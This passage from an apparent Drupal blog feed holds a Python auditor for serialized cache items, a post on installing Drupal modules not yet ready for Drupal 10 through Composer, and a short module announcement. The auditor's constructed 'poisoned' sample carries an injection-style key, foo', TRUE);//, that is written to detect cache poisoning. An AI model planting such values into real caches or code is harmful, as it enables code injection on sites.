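        if not MACHINE_NAME.fullmatch(str(key)):
            findings.append("entity type key is not a machine name: %r" % (key,))
    created = item.get("created")
    if isinstance(created, (int, float)) and created > now + 300:
        findings.append("'created' is in the future: %r" % (created,))
    return findings


# Constructed sample: a minimal, well-formed cache item.
CLEAN = (b'O:8:"stdClass":4:{s:3:"cid";s:14:"entity_info:en";'
         b's:4:"data";a:2:{s:4:"user";a:1:{s:10:"base table";s:5:"users";}'
         b's:4:"file";a:1:{s:10:"base table";s:12:"file_managed";}}'
         b's:7:"created";i:1700000000;s:6:"expire";i:0;}')

# Constructed sample: same item with a harmless marker key containing quote
# and bracket characters, and a far-future 'created' value.
POISONED = CLEAN.replace(
    b'a:2:{', b'a:3:{s:14:"foo\', TRUE);//";a:0:{}', 1
).replace(b"i:1700000000;", b"i:9999999999;")

if __name__ == "__main__":
    for label, raw in (("clean", CLEAN), ("poisoned", POISONED)):
        print(label, audit_entity_info(raw, now=1700000100))
```

Run against items read from a cache backend, the same function can back an alert; compressed items must be decompressed first.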

Thanks to Greg Knaddison (greggles) for reviewing this post.

Nov 27 2023
Nov 27
Allan Chappell

Senior Support Lead

Allan brings technological know-how and grounds it with some simple country living. His interests include DevOps, animal husbandry (raising rabbits and chickens), hiking, and automated testing.

November 27, 2023

At the time of this blog, we have done two major version upgrades of Drupal and have refined the process along the way. There has been a lot of work in the community, through the efforts of people like Matt Glaman to make this process easier.

As a Support Engineer, I see a lot of approaches for achieving the same results in many areas of my work. Here, I’d like to share with you three different ways to achieve an upgrade of a module or theme that isn’t ready for the next major Drupal version, each with pros and cons, but all absolutely acceptable.

Why do we have this problem?

All new Drupal developers have a hard time with the layers of code changes that happen in the Drupal community. We have custom package types, custom install locations, patches, and scaffolding. To make the challenges worse, we have two ways to identify a module’s dependencies — that being a .info.yml file and for some, a composer.json. This is because some Drupal modules may want to build upon an existing PHP library or project, in addition to other Drupal modules. To ease the pain of having to define some dependencies twice, both in the .info.yml file and composer.json file, Drupal.org built their packagist, a repository of Composer packages, to read the .info.yml files from the root of the project and create Composer version constraints from that. For example, if the .info file contained the following:

name: My Module
type: module
core_version_requirement: ^8.8 || ^9
dependencies:
  - ctools:ctools

Then Drupal.org’s packagist would create the following for the release that contained that .info.yml file, saving the contributed developer a lot of trouble.

{
    "type": "drupal-module",
    "name": "drupal/my_module",
    "require": {
      "drupal/core": "^8.8 || ^9",
      "drupal/ctools": "*"
    }
  }

I hit on something there, though. It will create that for the release the .info.yml was in. When most code changes come in the form of patches, this poses a challenge. You apply your patch to the .info.yml after you download the release from Drupal.org’s packagist. Additionally, Drupal.org doesn’t create a new release entry for every patch file in the issue queue. So you are left with the question, “How do I install a module on Drupal 10 that requires Drupal 9 so that I can patch it to make it compatible for Drupal 10?”

Drupal Lenient

One of the easiest methods for those who don’t understand the ins and outs of Composer is to use the Drupal Lenient plugin. It takes a lot of the manual work out of defining new packages and works with any drupal-* typed library. Types are introduced to us through the use of the Composer Installer plugin and manipulated further with something like Composer Installers Extender. Composer plugins can be quite powerful, but they ultimately add a layer of complexity to any project over using core composer tactics.

Drupal Lenient works by taking any defined package pulled in by any means via Composer and replacing its version constraints for drupal/core, at the time of this writing, with “^8 || ^9 || ^10”. So where the requirements might look like the earlier example, “drupal/core”: “^8.8 || ^9”, they are replaced, making it possible to install alongside Drupal 10, even though it might not be compatible yet. This allows you to patch, test, or use the module as is, much like if you would have downloaded the zip and thrown it into your custom modules directory.

An example may look like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8"
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/my_module": "1.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  },
  "extra": {
    "composer-exit-on-patch-failure": true,
    "drupal-lenient": {
      "allowed-list": [
        "drupal/my_module"
      ]
    },
    "patches": {
      "drupal/my_module": {
        "3289029: Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2022-06-16/my_module.1.x-dev.rector.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    }
  }
}

Note the Drupal-Lenient allow list. Also note that you will need to make sure to install the plugin before trying to install the module that doesn’t support Drupal 10 in this case. If you want an excellent step-by-step, Matt put one together in the Readme.

The pros:

  • Easy-peasy to install
  • Feeds off the original packagist packages, so if there is an upgrade, you don’t have to do anything special to transition

The cons:

  • Lenient has the control and may cause inexplicable errors when updating due to unsupported core versions
  • PHP devs not familiar with Drupal Lenient won’t know to look for it
  • Flaky experiences when switching in and out of branches that include this plugin. If you context switch a lot, be prepared to handle some errors due to Composer’s challenges maintaining state between branches.
  • Patches to other dependencies inside composer.json still require you to run through some hoops

Custom package

If you want more control over what the module can and cannot do, while keeping the core of Composer functionality without adding yet another plugin, check out this method. What we will do here is find out what version the patch or merge request is being applied against. It should be stated in the issue queue and by best practices is a dev version.

If you are a perfectionist, you can use composer install -vvv to find the URL or cache file that the module came from on packages.drupal.org. It is usually one of https://packages.drupal.org/files/packages/8/p2/drupal/my_module.json or https://packages.drupal.org/files/packages/8/p2/drupal/my_module~dev.json. You will note that the Composer cache system follows a very similar structure, swapping out certain characters with dashes.

With this information, you can grab the exact package as it’s defined in the Drupal packagist. Find the version you want, and then get it into your project’s composer.json.

Let’s use Context Active Trail as an example, because at the time of this writing, there is no Drupal 10 release available.

Drupal release information

Looking through the issue queue, we see Automated Drupal 10 compatibility fixes, which has a patch on it. I grab the Composer package info and paste the 2.0-dev info into my composer.json under the “repositories” section as a type “package.”

Drupal packages

Which should make your project look something like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "package",
      "package": {
        "keywords": [
          "Drupal",
          "Context",
          "Active trail",
          "Breadcrumbs"
        ],
        "homepage": "https://www.drupal.org/project/context_active_trail",
        "version": "dev-2.x",
        "version_normalized": "dev-2.x",
        "license": "GPL-2.0+",
        "authors": [
          {
            "name": "Jigar Mehta (jigarius)",
            "homepage": "https://jigarius.com/",
            "role": "Maintainer"
          },
          {
            "name": "jigarius",
            "homepage": "https://www.drupal.org/user/2492730"
          },
          {
            "name": "vasi",
            "homepage": "https://www.drupal.org/user/390545"
          }
        ],
        "support": {
          "source": "https://git.drupalcode.org/project/context_active_trail",
          "issues": "https://www.drupal.org/project/issues/context_active_trail"
        },
        "source": {
          "type": "git",
          "url": "https://git.drupalcode.org/project/context_active_trail.git",
          "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e"
        },
        "type": "drupal-module",
        "uid": "context_active_trail-3192784",
        "name": "drupal/context_active_trail",
        "extra": {
          "branch-alias": {
            "dev-2.x": "2.x-dev"
          },
          "drupal": {
            "version": "8.x-2.0-rc2+1-dev",
            "datestamp": "1630867980",
            "security-coverage": {
              "status": "not-covered",
              "message": "Project has not opted into security advisory coverage!"
            }
          }
        },
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^4.1",
          "drupal/core": "^8.8 || ^9"
        }
      }
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8"
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "2.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  },
  "extra": {
    "composer-exit-on-patch-failure": true,
    "patches": {
    },
    "patchLevel": {
      "drupal/core": "-p2"
    }
  }
}

Now let’s change our version criteria:

…
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^4.1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
…

And then add our patch:

…
  "extra": {
    "composer-exit-on-patch-failure": true,
    "patches": {
      "drupal/context_active_trail": {
        "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    }
  }
…

Here, you will need to look to see if the patch is patching composer.json. If it is, you will need to modify your package information accordingly. For example, in this one, the fixer changes drupal/context from ^4.1 to ^5.0.0-rc1. That change looks like this:

…
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^5.0.0-rc1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
…

Lastly, sometimes you run into some complications with the order packages are picked up by Composer. You may need to add an exclude element to the Drupal packagist.

…
  {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
  },
…

Our final composer.json for our project could look something like this with all the edits:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "package",
      "package": {
        "keywords": [
          "Drupal",
          "Context",
          "Active trail",
          "Breadcrumbs"
        ],
        "homepage": "https://www.drupal.org/project/context_active_trail",
        "version": "dev-2.x",
        "version_normalized": "dev-2.x",
        "license": "GPL-2.0+",
        "authors": [
          {
            "name": "Jigar Mehta (jigarius)",
            "homepage": "https://jigarius.com/",
            "role": "Maintainer"
          },
          {
            "name": "jigarius",
            "homepage": "https://www.drupal.org/user/2492730"
          },
          {
            "name": "vasi",
            "homepage": "https://www.drupal.org/user/390545"
          }
        ],
        "support": {
          "source": "https://git.drupalcode.org/project/context_active_trail",
          "issues": "https://www.drupal.org/project/issues/context_active_trail"
        },
        "source": {
          "type": "git",
          "url": "https://git.drupalcode.org/project/context_active_trail.git",
          "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e"
        },
        "type": "drupal-module",
        "uid": "context_active_trail-3192784",
        "name": "drupal/context_active_trail",
        "extra": {
          "branch-alias": {
            "dev-2.x": "2.x-dev"
          },
          "drupal": {
            "version": "8.x-2.0-rc2+1-dev",
            "datestamp": "1630867980",
            "security-coverage": {
              "status": "not-covered",
              "message": "Project has not opted into security advisory coverage!"
            }
          }
        },
        "description": "Set the active trail based on context.",
        "require": {
          "drupal/context": "^5.0.0-rc1",
          "drupal/core": "^8.8 || ^9 || ^10"
        }
      }
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "2.x-dev",
    "cweagans/composer-patches": "^1.7.3",
    "mglaman/composer-drupal-lenient": "^1.0.3"
  },
  "extra": {
    "composer-exit-on-patch-failure": true,
    "patches": {
      "drupal/context_active_trail": {
        "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch"
      }
    },
    "patchLevel": {
      "drupal/core": "-p2"
    }
  }
}

The pros:

  • Uses more core Composer functionality
  • A PHP developer will better understand what’s going on here
  • You are in complete control of how this module package and version are defined
  • All the work is in one file

The cons:

  • Requires some understanding of how composer.json, packagists, and the magic of Drupal’s packagist all work
  • That’s a messy composer.json for the project
  • If you have to use exclude, you have to leave it up to outside forces to let you know when that module does finally put out an actual D10-ready version, and then undo all of this work

Standard PHP composer best practice says that if you make modifications to a package, fork it, maintain your modifications, and provide a pull request if it’s functionality you wish to contribute back. You can use this same approach with Drupal modules as well. Some may even say that’s what issue forks are for! That said, issue forks come with the downside that sometimes they go away, or are overridden with changes you don’t want. They are a moving dot.

For the sake of this example, let’s assume that we have forked the module on GitHub to https://github.com/fourkitchens/context_active_trail.git. If you don’t know how to make a fork, simply do the following:

  • Clone the module to your local computer using the git instructions for the module in question
  • Check out the branch you want to base your changes on
  • Create a new repository on GitHub
  • Add it as a remote: git remote add github git@github.com:fourkitchens/context_active_trail.git
  • Push it! git push github 8.x-2.x

You can do this with a version of the module that is in a merge request in Drupal.org’s issue queue, too. That way you won’t have to reapply all the changes. However, if your changes are in a patch file, consider adding them to the module at this time using your favorite patching method. Push all your changes to the github remote.

If the patch files don’t have changes to composer.json, or if the module doesn’t have one, you will likely want to provide at least a bare-bones one that contains something like the following and commit it:

{
  "name": "drupal/context_active_trail",
  "type": "drupal-module",
  "require": {
    "drupal/context": "^5.0.0-rc1",
    "drupal/core": "^8.8 || ^9 || ^10"
  }
}

This will tell Composer what it needs to know inside the project about dependencies. This project already had a composer.json, so I needed to add the changes from the patch to it.

Inside our Drupal project we are working on, we need to add a new entry to the repositories section. It will look something like this:

    {
      "type": "vcs",
      "url": "https://github.com/fourkitchens/context_active_trail.git"
    },

The VCS type repository entry tells Composer to look at the repository and poll for all its branches and tags. These will be your new version numbers.

Much like in the “Custom Package” example, you may need to add an exclude property to the Drupal packagist entry.

…
  {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
  },
…

Now, since Drupal packagist isn’t here to give Composer some version aliases, we have to use the old notation dev-BRANCHNAME for our version. Our require entry will look something like this:

 "drupal/context_active_trail": "dev-8.x-2.x",

Since we already added our patches as a commit to the module, this is all you need. Your final composer.json for your project would look like this:

{
  "name": "vendor/project",
  "repositories": [
    {
      "type": "vcs",
      "url": "https://github.com/fourkitchens/context_active_trail.git"
    },
    {
      "type": "composer",
      "url": "https://packages.drupal.org/8",
      "exclude": [
          "drupal/context_active_trail"
      ]
    }
  ],
  "require": {
    "drupal/core": "^10.0.0",
    "drupal/context_active_trail": "dev-8.x-2.x"
  }
}

It makes for a much cleaner project json, but now you’ve split the work into two locations, requiring some synchronization. However, if multiple sites of yours use this same module and need the same fixes, this is absolutely the path of least resistance and gets those changes out more quickly.

The pros:

  • Reusability
  • Two smaller, simpler chunks of work
  • Any PHP developer should be able to debug this setup as it uses Composer best practices. This method will be used in any project with any framework in the PHP ecosystem.

The cons:

  • Changes are in two separate places
  • Which patches are applied isn’t obvious in the composer.json and requires looking through the commit history on the forked repository
  • Requires maintenance and synchronization when upgrades happen
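An inventory of the overrides that the three approaches above leave behind in a project's composer.json, as an added example that is not from the original post or from any of the projects it mentions. The function name, the finding codes and the sample document (assembled from the article's own values) are assumptions made for the illustration.

```python
import json


def audit_overrides(composer):
    """Return {name: [(code, detail), ...]} for each compatibility override."""
    report = {}

    def note(name, code, detail):
        report.setdefault(name, []).append((code, detail))

    repos = composer.get("repositories", [])
    if isinstance(repos, dict):          # Composer also accepts a keyed object
        repos = list(repos.values())
    for repo in repos:
        if not isinstance(repo, dict):   # skips entries such as "packagist.org": false
            continue
        if repo.get("type") == "package":
            pkgs = repo.get("package", [])
            for pkg in pkgs if isinstance(pkgs, list) else [pkgs]:
                name = pkg.get("name", "(unnamed)")
                requires = json.dumps(pkg.get("require", {}), sort_keys=True)
                note(name, "inline-package", "hand-edited definition, requires " + requires)
                if not (pkg.get("source") or {}).get("reference"):
                    note(name, "unpinned-source", "no source.reference commit")
        elif repo.get("type") == "vcs":
            # The package name lives in the fork's own composer.json,
            # so the finding is keyed by repository URL instead.
            note(repo.get("url", "(no url)"), "vcs-fork",
                 "versions come from this repository's branches and tags")
        for name in repo.get("exclude", []):
            note(name, "upstream-excluded",
                 "releases from %s are hidden from Composer" % repo.get("url"))

    extra = composer.get("extra", {})
    for name in extra.get("drupal-lenient", {}).get("allowed-list", []):
        note(name, "lenient", "drupal/core constraint is ignored")
    for name, patches in extra.get("patches", {}).items():
        for title, url in patches.items():
            code = "patched-over-http" if url.startswith("http://") else "patched"
            note(name, code, "%s <%s>" % (title, url))
    for name, version in composer.get("require", {}).items():
        if version.startswith("dev-") or version.endswith("-dev"):
            note(name, "dev-version", "tracks a moving branch: " + version)
    return report


# Constructed sample combining the article's own composer.json fragments.
SAMPLE = {
    "repositories": [
        {"type": "package", "package": {
            "name": "drupal/context_active_trail",
            "version": "dev-2.x",
            "source": {
                "type": "git",
                "url": "https://git.drupalcode.org/project/context_active_trail.git",
                "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e"},
            "require": {"drupal/context": "^5.0.0-rc1",
                        "drupal/core": "^8.8 || ^9 || ^10"}}},
        {"type": "composer", "url": "https://packages.drupal.org/8",
         "exclude": ["drupal/context_active_trail"]},
    ],
    "require": {"drupal/core": "^10.0.0",
                "drupal/context_active_trail": "2.x-dev",
                "drupal/my_module": "1.x-dev"},
    "extra": {
        "drupal-lenient": {"allowed-list": ["drupal/my_module"]},
        "patches": {"drupal/context_active_trail": {
            "Automated Drupal 10 compatibility fixes":
                "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch"}},
    },
}

if __name__ == "__main__":
    for package, findings in audit_overrides(SAMPLE).items():
        for code, detail in findings:
            print("%-32s %-18s %s" % (package, code, detail))
```

Packages flagged upstream-excluded are the ones to re-check by hand for new releases, since Composer no longer sees them on packages.drupal.org.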

Final thoughts

As with almost everything out there, there are multiple ways to achieve the same goal. I hope this brings awareness, and helps provide the flexibility you need when upgrading Drupal to a new major version. Obviously, each solution has strengths, and you may need to mix it up to get the results you want.


Nov 24 2023
Nov 24

As I embarked on a recent journey to enhance the usability of Drupal from the perspective of both site owners and editors, I stumbled upon what could be a game changer for content editors – the "Same Page Preview" module.

This module offers an innovative solution, providing a page preview seamlessly integrated into the editing process. Say goodbye to the hassle of toggling between the edit form and a separate preview window. With the "Same Page Preview" module, it's all about real-time content visualisation and efficiency.


Key Features

Effortless Installation

Setting up the "Same Page Preview" module is a breeze, and it's a matter of a simple checkbox configuration against specific content types.

On-Page Canvas Preview

When adding or editing content, an on-page canvas preview elegantly unfolds. As you interact with the edit form fields, the preview updates in real time, offering an instant, dynamic view of your content.

Custom Display Options

Tailor your preview experience to your liking. Choose to open the display in a new window, view content in full-screen mode, or select your preferred display mode. The module is all about personalising your content editing workflow.


Why it matters 

Watch a Short Demo: https://youtu.be/Mh_plCpt1_A


The "Same Page Preview" module has recently received recognition on the Talking Drupal podcast, where its potential was discussed. Furthermore, there's an active issue in the Drupal core ideas project advocating for the inclusion of this module in the Drupal core.


In my opinion, integrating "Same Page Preview" into the Drupal core would be an invaluable asset. I've encountered numerous projects where the concept of in-page content previews has sparked considerable interest and discussion.


Join me in exploring the possibilities that this module brings to the Drupal community and in advocating for its inclusion in the Drupal core. Let's make content editing even more user-friendly and efficient.
